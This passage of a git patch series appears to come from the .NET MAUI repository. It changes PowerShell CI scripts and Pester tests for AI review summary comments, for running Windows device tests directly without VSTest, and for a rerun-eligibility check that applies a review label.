+ candidateDiff = "diff --git a/file.cs b/file.cs`n+fixed" + } | ConvertTo-Json -Depth 5 | Set-Content (Join-Path $script:testDir 'winner.json') -Encoding UTF8 + + $section = New-FutureActionSection -PRAgentDir $script:testDir + + $section | Should -Match 'Future Action' + $section | Should -Match 'alternative fix proposed' + $section | Should -Match 'try-fix-2' + $section | Should -Match 'Candidate avoids the regression' + $section | Should -Match 'diff --git a/file.cs b/file.cs' + } +} diff --git a/.github/scripts/Remove-StaleMauiBotComments.Tests.ps1 b/.github/scripts/Remove-StaleMauiBotComments.Tests.ps1 index 21c43a0813ed..d46d4e13109e 100644 --- a/.github/scripts/Remove-StaleMauiBotComments.Tests.ps1 +++ b/.github/scripts/Remove-StaleMauiBotComments.Tests.ps1 @@ -30,6 +30,24 @@ Describe 'MauiBot artifact marker detection' { Test-IsTryFixCommentBody -Body 'Automated review — alternative fix proposed' | Should -BeTrue } + + It 'does not treat the merged AI Summary Future Action section as a standalone try-fix artifact' { + $body = @' + + +
+Future Action — alternative fix proposed (try-fix-1) + +**Automated review — alternative fix proposed** + +
Candidate diff (try-fix-1) +
+
+'@ + + Test-IsTryFixCommentBody -Body $body | + Should -BeFalse + } } Describe 'Test-ShouldPreserveMauiBotArtifact' { diff --git a/.github/scripts/post-ai-summary-comment.ps1 b/.github/scripts/post-ai-summary-comment.ps1 index 444288e49895..1caa3190d53a 100644 --- a/.github/scripts/post-ai-summary-comment.ps1 +++ b/.github/scripts/post-ai-summary-comment.ps1 @@ -390,31 +390,20 @@ function Test-HasNonPRWinner { } } -function Get-PreservedMauiBotNodeIds { - param([Parameter(Mandatory = $true)][string]$PRAgentDir) +function Get-AIReviewEventForRun { + param( + [string]$ReportContent, - $files = @( - 'try-fix-review-node-id.txt', - 'ai-summary-review-node-id.txt', - 'current-review-node-ids.txt' + [Parameter(Mandatory = $true)] + [string]$PRAgentDir ) - $nodeIds = @() - foreach ($file in $files) { - $path = Join-Path $PRAgentDir $file - if (-not (Test-Path $path)) { - continue - } - - $nodeIds += Get-Content $path -Encoding UTF8 | ForEach-Object { - $value = [string]$_ - if (-not [string]::IsNullOrWhiteSpace($value)) { - $value.Trim() - } - } + $reviewEvent = Get-AIReviewEvent -ReportContent $ReportContent + if ((Test-HasNonPRWinner -PRAgentDir $PRAgentDir) -and $reviewEvent -eq 'COMMENT') { + return 'REQUEST_CHANGES' } - return @($nodeIds | Where-Object { -not [string]::IsNullOrWhiteSpace($_) } | Select-Object -Unique) + return $reviewEvent } function Invoke-PostPullRequestReview { @@ -517,10 +506,7 @@ if (-not $gateSection -and $phaseSections.Count -eq 0) { throw "No gate or phase content found. Ensure at least one of gate/content.md or {phase}/content.md exists in $PRAgentDir." 
} -$reviewEvent = Get-AIReviewEvent -ReportContent $phaseContentByKey['report'] -if ((Test-HasNonPRWinner -PRAgentDir $PRAgentDir) -and $reviewEvent -eq 'COMMENT') { - $reviewEvent = 'REQUEST_CHANGES' -} +$reviewEvent = Get-AIReviewEventForRun -ReportContent $phaseContentByKey['report'] -PRAgentDir $PRAgentDir Write-Host " 🧾 PR review event: $reviewEvent" -ForegroundColor Cyan # ============================================================================ @@ -669,8 +655,6 @@ if ($DryRun) { # HIDE STALE GENERATED ARTIFACTS, THEN POST REVIEW # ============================================================================ -$preserveNodeIds = Get-PreservedMauiBotNodeIds -PRAgentDir $PRAgentDir - if (Get-Command Hide-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { Hide-StaleMauiBotIssueComments ` -PRNumber $PRNumber ` @@ -678,7 +662,6 @@ if (Get-Command Hide-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { -IncludeLegacyGate ` -IncludeMergeConflict ` -IncludeTryFix ` - -PreserveNodeIds $preserveNodeIds ` -Reason "stale generated PR review artifact" } @@ -687,7 +670,6 @@ if (Get-Command Hide-StaleMauiBotPullRequestReviews -ErrorAction SilentlyContinu -PRNumber $PRNumber ` -IncludeAISummary ` -IncludeTryFix ` - -PreserveNodeIds $preserveNodeIds ` -Reason "stale generated PR review" ` -DismissFormalReviews } diff --git a/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 b/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 index c816ac000501..1ca3cbe16a8e 100644 --- a/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 +++ b/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 @@ -41,6 +41,10 @@ function Test-IsTryFixCommentBody { return $false } + if ($Body.Contains($script:AiSummaryCommentMarker)) { + return $false + } + return $Body.Contains($script:TryFixCommentMarker) -or ($Body.Contains('Automated review') -and $Body.Contains('alternative fix proposed')) -or ($Body.Contains('try-fix-') -and $Body.Contains('Candidate diff')) From 
5f3beaa8c9e2fe275fb8f536bb0f6e965e214d5c Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 31 May 2026 20:54:13 +0200 Subject: [PATCH 21/34] Run Windows device tests without VSTest Use the built Windows device-test app directly for gate validation so the runner avoids testhost dependency crashes and matches the canonical windows.cake path. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/skills/run-device-tests/SKILL.md | 6 +- .../scripts/Run-DeviceTests.Tests.ps1 | 86 ++++++ .../scripts/Run-DeviceTests.ps1 | 259 ++++++++++++++++-- 3 files changed, 326 insertions(+), 25 deletions(-) create mode 100644 .github/skills/run-device-tests/scripts/Run-DeviceTests.Tests.ps1 diff --git a/.github/skills/run-device-tests/SKILL.md b/.github/skills/run-device-tests/SKILL.md index 5ad415535a11..1a4dc10098da 100644 --- a/.github/skills/run-device-tests/SKILL.md +++ b/.github/skills/run-device-tests/SKILL.md @@ -157,7 +157,7 @@ pwsh .github/skills/run-device-tests/scripts/Run-DeviceTests.ps1 -Project Core - - Windows tests run directly on the local machine - Simulator/emulator selection and boot logic is handled by `.github/scripts/shared/Start-Emulator.ps1` - xharness manages test execution and reporting for iOS/MacCatalyst/Android -- Windows uses vstest for test execution +- Windows runs the built device-test app directly and reads its xUnit XML results, matching `eng/devices/windows.cake` ## Test Filtering @@ -191,7 +191,7 @@ Test filtering is implemented in `src/Core/tests/DeviceTests.Shared/DeviceTestSh |----------|---------------------|-------------------| | **iOS/MacCatalyst** | `--set-env=TestFilter=...` | `NSProcessInfo.ProcessInfo.Environment["TestFilter"]` | | **Android** | `--arg TestFilter=...` | `MauiTestInstrumentation.Current.Arguments.GetString("TestFilter")` | -| **Windows** | `--filter "Category=..."` | Native vstest filter | +| **Windows Controls** | App argument selects discovered 
category index | `ControlsHeadlessTestRunner` category loop | ### Available Test Categories @@ -258,7 +258,7 @@ The script automatically handles XHarness device targeting for iOS and Android: ### Windows - No device/emulator needed -- Uses vstest (`dotnet test`) for test execution +- Runs the built device-test app directly and parses `TestResults-*.xml` **Why both --target and --device for iOS?** - XHarness requires `--target ios-simulator-64` (or `ios-simulator-64_VERSION`) to specify platform type diff --git a/.github/skills/run-device-tests/scripts/Run-DeviceTests.Tests.ps1 b/.github/skills/run-device-tests/scripts/Run-DeviceTests.Tests.ps1 new file mode 100644 index 000000000000..5590ed3deea2 --- /dev/null +++ b/.github/skills/run-device-tests/scripts/Run-DeviceTests.Tests.ps1 @@ -0,0 +1,86 @@ +#!/usr/bin/env pwsh +#Requires -Modules Pester + +BeforeAll { + $scriptPath = Join-Path $PSScriptRoot 'Run-DeviceTests.ps1' + $tokens = $null + $parseErrors = $null + $ast = [System.Management.Automation.Language.Parser]::ParseFile($scriptPath, [ref]$tokens, [ref]$parseErrors) + if ($parseErrors -and $parseErrors.Count -gt 0) { + throw ($parseErrors | ForEach-Object { $_.Message }) -join [Environment]::NewLine + } + + foreach ($functionName in @( + 'Get-CategoryFiltersFromTestFilter', + 'Select-WindowsDeviceTestCategories', + 'Get-WindowsDeviceTestResultSummary' + )) { + $function = $ast.Find({ + $args[0] -is [System.Management.Automation.Language.FunctionDefinitionAst] -and + $args[0].Name -eq $functionName + }, $true) + + if (-not $function) { + throw "Function '$functionName' not found" + } + + Invoke-Expression $function.Extent.Text + } +} + +Describe 'Windows device test category filtering' { + It 'extracts Category filters from VSTest-style expressions' { + Get-CategoryFiltersFromTestFilter -Filter 'Category=Window|Category=Button' | + Should -Be @('Window', 'Button') + } + + It 'selects matching discovered categories case-insensitively' { + 
Select-WindowsDeviceTestCategories ` + -AllCategories @('Button', 'Window', 'Shell') ` + -Filter 'Category=window' | + Should -Be @('Window') + } + + It 'returns all categories when no category filter is supplied' { + Select-WindowsDeviceTestCategories ` + -AllCategories @('Button', 'Window') ` + -Filter '' | + Should -Be @('Button', 'Window') + } +} + +Describe 'Get-WindowsDeviceTestResultSummary' { + BeforeEach { + $script:testDir = Join-Path ([System.IO.Path]::GetTempPath()) "windows-device-results-$([guid]::NewGuid())" + New-Item -ItemType Directory -Path $script:testDir -Force | Out-Null + } + + AfterEach { + Remove-Item -LiteralPath $script:testDir -Recurse -Force -ErrorAction SilentlyContinue + } + + It 'aggregates xUnit assembly counters from Windows device-test XML files' { + $file1 = Join-Path $script:testDir 'TestResults-One.xml' + $file2 = Join-Path $script:testDir 'TestResults-Two.xml' + + @' + + + +'@ | Set-Content $file1 -Encoding UTF8 + + @' + + + +'@ | Set-Content $file2 -Encoding UTF8 + + $summary = Get-WindowsDeviceTestResultSummary -ResultFiles @($file1, $file2) + + $summary.Total | Should -Be 5 + $summary.Passed | Should -Be 3 + $summary.Failed | Should -Be 1 + $summary.Skipped | Should -Be 1 + $summary.Errors | Should -Be 0 + } +} diff --git a/.github/skills/run-device-tests/scripts/Run-DeviceTests.ps1 b/.github/skills/run-device-tests/scripts/Run-DeviceTests.ps1 index 5a94bf00fb2a..9d8cd1c5eb1f 100644 --- a/.github/skills/run-device-tests/scripts/Run-DeviceTests.ps1 +++ b/.github/skills/run-device-tests/scripts/Run-DeviceTests.ps1 @@ -1,6 +1,6 @@ <# .SYNOPSIS - Builds and runs .NET MAUI device tests locally using xharness (Apple/Android) or vstest (Windows). + Builds and runs .NET MAUI device tests locally using xharness (Apple/Android) or the Windows device-test app directly. 
.DESCRIPTION This script builds a specified MAUI device test project for the target platform @@ -140,6 +140,224 @@ $AppNames = @{ "AI" = "Microsoft.Maui.Essentials.AI.DeviceTests" } +$WindowsDeviceTestPackageIds = @{ + "Controls" = "Microsoft.Maui.Controls.DeviceTests" + "Core" = "Microsoft.Maui.Core.DeviceTests" + "Essentials" = "Microsoft.Maui.Essentials.DeviceTests" + "Graphics" = "Microsoft.Maui.Graphics.DeviceTests" + "BlazorWebView" = "Microsoft.Maui.MauiBlazorWebView.DeviceTests" + "AI" = "Microsoft.Maui.Essentials.AI.DeviceTests" +} + +function Get-CategoryFiltersFromTestFilter { + param([string]$Filter) + + if ([string]::IsNullOrWhiteSpace($Filter)) { + return @() + } + + $categories = @() + $matches = [regex]::Matches($Filter, '(?i)\bCategory\s*=\s*([^\|&(),]+)') + foreach ($match in $matches) { + $value = $match.Groups[1].Value.Trim().Trim('"', "'") + if (-not [string]::IsNullOrWhiteSpace($value)) { + $categories += $value + } + } + + if ($categories.Count -eq 0 -and $Filter -notmatch '[=~]') { + $categories = @($Filter -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ }) + } + + return @($categories | Select-Object -Unique) +} + +function Select-WindowsDeviceTestCategories { + param( + [string[]]$AllCategories, + [string]$Filter + ) + + $filters = @(Get-CategoryFiltersFromTestFilter -Filter $Filter) + if ($filters.Count -eq 0) { + return @($AllCategories) + } + + return @($AllCategories | Where-Object { + $category = $_ + @($filters | Where-Object { + $category.Equals($_, [System.StringComparison]::OrdinalIgnoreCase) -or + $category.IndexOf($_, [System.StringComparison]::OrdinalIgnoreCase) -ge 0 + }).Count -gt 0 + }) +} + +function Wait-ForPath { + param( + [Parameter(Mandatory = $true)] + [string]$Path, + + [Parameter(Mandatory = $true)] + [int]$TimeoutSeconds, + + [System.Diagnostics.Process]$Process + ) + + $stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + while ($stopwatch.Elapsed.TotalSeconds -lt $TimeoutSeconds) { + if 
(Test-Path $Path) { + return $true + } + + if ($Process -and $Process.HasExited) { + Start-Sleep -Seconds 1 + if (Test-Path $Path) { + return $true + } + return $false + } + + Start-Sleep -Seconds 1 + } + + return (Test-Path $Path) +} + +function Get-WindowsDeviceTestResultSummary { + param([Parameter(Mandatory = $true)][string[]]$ResultFiles) + + $summary = @{ + Total = 0 + Passed = 0 + Failed = 0 + Skipped = 0 + Errors = 0 + } + + foreach ($file in $ResultFiles) { + if (-not (Test-Path $file)) { + continue + } + + [xml]$xml = Get-Content $file -Raw + $assemblies = @($xml.SelectNodes('/assemblies/assembly')) + foreach ($assembly in $assemblies) { + $summary.Total += [int]($assembly.total ?? 0) + $summary.Passed += [int]($assembly.passed ?? 0) + $summary.Failed += [int]($assembly.failed ?? 0) + $summary.Skipped += [int]($assembly.skipped ?? 0) + $summary.Errors += [int]($assembly.errors ?? 0) + } + } + + return $summary +} + +function Invoke-WindowsDeviceTestApp { + param( + [Parameter(Mandatory = $true)] + [string]$AppPath, + + [Parameter(Mandatory = $true)] + [string]$Project, + + [Parameter(Mandatory = $true)] + [string]$AppName, + + [Parameter(Mandatory = $true)] + [string]$OutputDirectory, + + [string]$TestFilter, + + [string]$Timeout = "01:00:00" + ) + + $timeoutSeconds = [int][TimeSpan]::Parse($Timeout).TotalSeconds + if ($timeoutSeconds -le 0) { + $timeoutSeconds = 3600 + } + + if (-not (Test-Path $OutputDirectory)) { + New-Item -ItemType Directory -Path $OutputDirectory -Force | Out-Null + } + + $packageId = $WindowsDeviceTestPackageIds[$Project] + if (-not $packageId) { + $packageId = $AppName + } + + $resultBase = Join-Path $OutputDirectory "TestResults-$($packageId.Replace('.', '_'))" + $resultFile = "$resultBase.xml" + $categoriesFile = Join-Path $OutputDirectory "devicetestcategories.txt" + Remove-Item -LiteralPath $categoriesFile -Force -ErrorAction SilentlyContinue + Remove-Item -Path "$resultBase*.xml" -Force -ErrorAction SilentlyContinue + + 
$resultFiles = @() + if ($Project -eq "Controls") { + Write-Host "Discovering Windows device test categories..." -ForegroundColor Gray + $discoveryProcess = Start-Process -FilePath $AppPath -ArgumentList @($resultFile, "-1") -PassThru + if (-not (Wait-ForPath -Path $categoriesFile -TimeoutSeconds 120 -Process $discoveryProcess)) { + if ($discoveryProcess -and -not $discoveryProcess.HasExited) { + Stop-Process -Id $discoveryProcess.Id -Force -ErrorAction SilentlyContinue + } + throw "Windows device test category discovery did not create $categoriesFile" + } + + $allCategories = @(Get-Content $categoriesFile | Where-Object { -not [string]::IsNullOrWhiteSpace($_) }) + $selectedCategories = @(Select-WindowsDeviceTestCategories -AllCategories $allCategories -Filter $TestFilter) + if ($selectedCategories.Count -eq 0) { + throw "Test filter '$TestFilter' matched 0 Windows device test categories. Available categories: $($allCategories -join ', ')" + } + + Write-Host "Running $($selectedCategories.Count) of $($allCategories.Count) Windows device test categor$(if ($selectedCategories.Count -eq 1) { 'y' } else { 'ies' }): $($selectedCategories -join ', ')" -ForegroundColor Yellow + + foreach ($category in $selectedCategories) { + $categoryIndex = [Array]::IndexOf($allCategories, $category) + if ($categoryIndex -lt 0) { + throw "Could not find category '$category' in discovered category list." + } + + $categoryResultFile = "$resultBase`_$category.xml" + Remove-Item -LiteralPath $categoryResultFile -Force -ErrorAction SilentlyContinue + Write-Host "Running Windows device test category '$category' (index $categoryIndex)..." 
-ForegroundColor Gray + $process = Start-Process -FilePath $AppPath -ArgumentList @($resultFile, [string]$categoryIndex) -PassThru + if (-not (Wait-ForPath -Path $categoryResultFile -TimeoutSeconds $timeoutSeconds -Process $process)) { + if ($process -and -not $process.HasExited) { + Stop-Process -Id $process.Id -Force -ErrorAction SilentlyContinue + } + throw "Windows device test category '$category' did not create $categoryResultFile" + } + + $resultFiles += $categoryResultFile + } + } else { + if ($TestFilter) { + Write-Warning "Windows non-Controls device tests do not support dynamic category filtering; running the full $Project device test app." + } + + Write-Host "Running Windows device test app directly..." -ForegroundColor Gray + $process = Start-Process -FilePath $AppPath -ArgumentList @($resultFile) -PassThru + if (-not (Wait-ForPath -Path $resultFile -TimeoutSeconds $timeoutSeconds -Process $process)) { + if ($process -and -not $process.HasExited) { + Stop-Process -Id $process.Id -Force -ErrorAction SilentlyContinue + } + throw "Windows device test app did not create $resultFile" + } + + $resultFiles += $resultFile + } + + $summary = Get-WindowsDeviceTestResultSummary -ResultFiles $resultFiles + $script:WindowsDeviceTestSummary = $summary + $script:WindowsDeviceTestResultFiles = $resultFiles + + if (($summary.Failed + $summary.Errors) -eq 0) { + return 0 + } + + return 1 +} + # Android package names (lowercase) $AndroidPackageNames = @{ "Controls" = "com.microsoft.maui.controls.devicetests" @@ -576,32 +794,29 @@ try { $testExitCode = $LASTEXITCODE } else { # ═══════════════════════════════════════════════════════════ - # VSTEST EXECUTION (Windows) + # WINDOWS DEVICE TEST EXECUTION # ═══════════════════════════════════════════════════════════ - - Write-Host "Running tests with vstest..." 
-ForegroundColor Gray - Write-Host "" - - $vstestArgs = @( - "test" - $projectPath - "-c", $Configuration - "-f", $platformConfig.Tfm - "--no-build" - "--logger", "trx;LogFileName=TestResults.trx" - "--results-directory", $OutputDirectory - ) - if ($TestFilter) { - $vstestArgs += "--filter", $TestFilter - } - - Write-Host "Running: dotnet $($vstestArgs -join ' ')" -ForegroundColor Gray + Write-Host "Running Windows device test app directly..." -ForegroundColor Gray + Write-Host "This matches eng/devices/windows.cake and avoids VSTest/testhost for MAUI Windows device apps." -ForegroundColor Gray Write-Host "" - & dotnet @vstestArgs + $testExitCode = Invoke-WindowsDeviceTestApp ` + -AppPath $appPath ` + -Project $Project ` + -AppName $appName ` + -OutputDirectory $OutputDirectory ` + -TestFilter $TestFilter ` + -Timeout $Timeout - $testExitCode = $LASTEXITCODE + if ($script:WindowsDeviceTestSummary) { + Write-Host "" + Write-Output " Passed: $($script:WindowsDeviceTestSummary.Passed)" + Write-Output " Failed: $($script:WindowsDeviceTestSummary.Failed + $script:WindowsDeviceTestSummary.Errors)" + Write-Output " Skipped: $($script:WindowsDeviceTestSummary.Skipped)" + Write-Output " Total: $($script:WindowsDeviceTestSummary.Total)" + Write-Host " Result file(s): $($script:WindowsDeviceTestResultFiles -join ', ')" -ForegroundColor Gray + } } # ═══════════════════════════════════════════════════════════ From 4b8e6dc02e497598557ed98e215ba51cd9c2ef41 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 31 May 2026 21:17:27 +0200 Subject: [PATCH 22/34] Add deterministic review rerun gate Teach /review rerun to run a deterministic activity check for new comments or commits and apply s/agent-ready-for-rerun when another AI review is justified. Also add rerun guidance to generated AI Summary comments. 
Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/docs/agent-labels.md | 8 +- .../Resolve-RerunEligibility.Tests.ps1 | 211 ++++++++++++ .github/scripts/Resolve-RerunEligibility.ps1 | 313 ++++++++++++++++++ .github/scripts/post-ai-summary-comment.ps1 | 1 + .github/scripts/shared/Update-AgentLabels.ps1 | 1 + .github/workflows/review-trigger.yml | 56 +++- 6 files changed, 586 insertions(+), 4 deletions(-) create mode 100644 .github/scripts/Resolve-RerunEligibility.Tests.ps1 create mode 100644 .github/scripts/Resolve-RerunEligibility.ps1 diff --git a/.github/docs/agent-labels.md b/.github/docs/agent-labels.md index 2a43521e4c14..13f5be605ed8 100644 --- a/.github/docs/agent-labels.md +++ b/.github/docs/agent-labels.md @@ -41,13 +41,14 @@ Always applied on every completed agent run. |-------|-------|-------------|--------------| | `s/agent-reviewed` | 🔵 `#1565C0` | PR was reviewed by AI agent workflow (full 4-phase review) | Every completed agent run | -### Manual Label +### Manual / Queue Labels -Applied by MAUI maintainers, not by automation. +Manual labels are applied by MAUI maintainers. Queue labels are applied by deterministic automation, not by AI. | Label | Color | Description | Applied When | |-------|-------|-------------|--------------| | `s/agent-fix-implemented` | 🟣 `#7B1FA2` | PR author implemented the agent's suggested fix | Maintainer applies when PR author adopts agent's recommendation | +| `s/agent-ready-for-rerun` | 🟣 `#5319E7` | AI review has new PR activity and is ready for rerun | `/review rerun` finds new comments or commits after the latest AI Summary / previous rerun request | --- @@ -71,7 +72,7 @@ Review-PR.ps1 └── Non-fatal: errors warn but don't fail the workflow ``` -Labels are applied exclusively from `Review-PR.ps1` Phase 4. No other script applies agent labels. This single-source design avoids label conflicts and simplifies debugging. +Most review outcome labels are applied from `Review-PR.ps1` Phase 4. 
The exception is `s/agent-ready-for-rerun`, which is applied by the deterministic `/review rerun` GitHub Action path after checking for new comments or commits. The rerun path does not use AI to decide whether the label applies. ### How Labels Are Parsed @@ -140,6 +141,7 @@ is:pr label:s/agent-reviewed |------|---------| | `.github/scripts/shared/Update-AgentLabels.ps1` | Label helper module (all label logic) | | `.github/scripts/Review-PR.ps1` | Orchestrator that calls `Apply-AgentLabels` in Phase 4 | +| `.github/scripts/Resolve-RerunEligibility.ps1` | Deterministic `/review rerun` checker that can apply `s/agent-ready-for-rerun` | | `.github/skills/pr-review/SKILL.md` | Documents label system for the pr-review skill | ### Key Functions diff --git a/.github/scripts/Resolve-RerunEligibility.Tests.ps1 b/.github/scripts/Resolve-RerunEligibility.Tests.ps1 new file mode 100644 index 000000000000..35911de8ac4e --- /dev/null +++ b/.github/scripts/Resolve-RerunEligibility.Tests.ps1 @@ -0,0 +1,211 @@ +BeforeAll { + . 
"$PSScriptRoot/Resolve-RerunEligibility.ps1" -PRNumber 1 -CurrentCommentId 1 + + function New-TestUser { + param( + [string]$Login = 'dev-user', + [string]$Type = 'User' + ) + + [pscustomobject]@{ + login = $Login + type = $Type + } + } + + function New-TestComment { + param( + [int64]$Id, + [string]$Body, + [string]$CreatedAt, + [string]$UpdatedAt = $CreatedAt, + [string]$Login = 'dev-user', + [string]$Type = 'User', + [string]$Kind = 'issue-comment' + ) + + [pscustomobject]@{ + id = $Id + kind = $Kind + body = $Body + created_at = $CreatedAt + updated_at = $UpdatedAt + user = New-TestUser -Login $Login -Type $Type + } + } + + function New-TestCommit { + param( + [string]$Sha, + [string]$Date + ) + + [pscustomobject]@{ + sha = $Sha + commit = [pscustomobject]@{ + author = [pscustomobject]@{ date = $Date } + committer = [pscustomobject]@{ date = $Date } + } + } + } + + function New-AISummaryBody { + param([string]$Sha = 'abcdef1') + + @" + + +## AI Review Summary + + +
+Review Sessions — click to expand +
+ +"@ + } +} + +Describe 'Resolve-RerunEligibility' { + It 'rejects commands when no AI Summary exists' { + $comments = @( + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' + + $result.Eligible | Should -BeFalse + $result.Reason | Should -Be 'no-ai-summary' + } + + It 'rejects a rerun command when there are no new comments or commits' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' + + $result.Eligible | Should -BeFalse + $result.Reason | Should -Be 'no-new-comments-or-commits' + } + + It 'accepts a non-command comment after the latest AI Summary' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 2 -Body 'I pushed the requested update.' 
-CreatedAt '2026-05-31T09:45:00Z' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' + + $result.Eligible | Should -BeTrue + $result.Reason | Should -Be 'new-comment-after-ai-summary' + } + + It 'does not count repeated rerun commands as evidence' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 9 -Body '/review rerun' -CreatedAt '2026-05-31T09:45:00Z' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' + + $result.Eligible | Should -BeFalse + $result.Reason | Should -Be 'no-new-comments-or-commits' + } + + It 'accepts a non-command comment after the previous rerun command' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 8 -Body '/review rerun' -CreatedAt '2026-05-31T09:45:00Z' + New-TestComment -Id 9 -Body 'Follow-up detail after rerun request.' 
-CreatedAt '2026-05-31T09:50:00Z' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' + + $result.Eligible | Should -BeTrue + $result.Reason | Should -Be 'new-comment-after-previous-rerun' + } + + It 'does not reuse old activity from before a previous rerun command' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 7 -Body 'Old follow-up before the first rerun.' -CreatedAt '2026-05-31T09:40:00Z' + New-TestComment -Id 8 -Body '/review rerun' -CreatedAt '2026-05-31T09:45:00Z' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' + + $result.Eligible | Should -BeFalse + $result.Reason | Should -Be 'no-new-comments-or-commits' + } + + It 'finds AI Summary content posted as a PR review' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' -Kind 'review' + New-TestComment -Id 2 -Body 'Follow-up after the review.' 
-CreatedAt '2026-05-31T09:45:00Z' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' + + $result.Eligible | Should -BeTrue + $result.Reason | Should -Be 'new-comment-after-ai-summary' + } + + It 'accepts a current head SHA that differs from the latest reviewed session' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody -Sha 'abcdef1') -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'fedcba9876543210' + + $result.Eligible | Should -BeTrue + $result.Reason | Should -Be 'new-head-commit' + } + + It 'accepts a commit after the previous rerun command' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 8 -Body '/review rerun' -CreatedAt '2026-05-31T09:45:00Z' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + $commits = @( + New-TestCommit -Sha 'abcdef123' -Date '2026-05-31T09:50:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits $commits -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' + + $result.Eligible | Should -BeTrue + $result.Reason | Should -Be 'new-commit-after-previous-rerun' + } + + It 'rejects bot rerun comments' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' -Login 'maui-bot' -Type 'Bot' + ) + + $result = Resolve-RerunEligibility -Comments $comments 
-Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' + + $result.Eligible | Should -BeFalse + $result.Reason | Should -Be 'bot-comment' + } + + It 'is idempotent when ready-for-rerun label already exists' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' + ) + + $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' -CurrentLabels @('s/agent-ready-for-rerun') + + $result.Eligible | Should -BeTrue + $result.Reason | Should -Be 'label-already-present' + } +} diff --git a/.github/scripts/Resolve-RerunEligibility.ps1 b/.github/scripts/Resolve-RerunEligibility.ps1 new file mode 100644 index 000000000000..72eca378f866 --- /dev/null +++ b/.github/scripts/Resolve-RerunEligibility.ps1 @@ -0,0 +1,313 @@ +#!/usr/bin/env pwsh +<# +.SYNOPSIS + Determines whether a /review rerun request should mark a 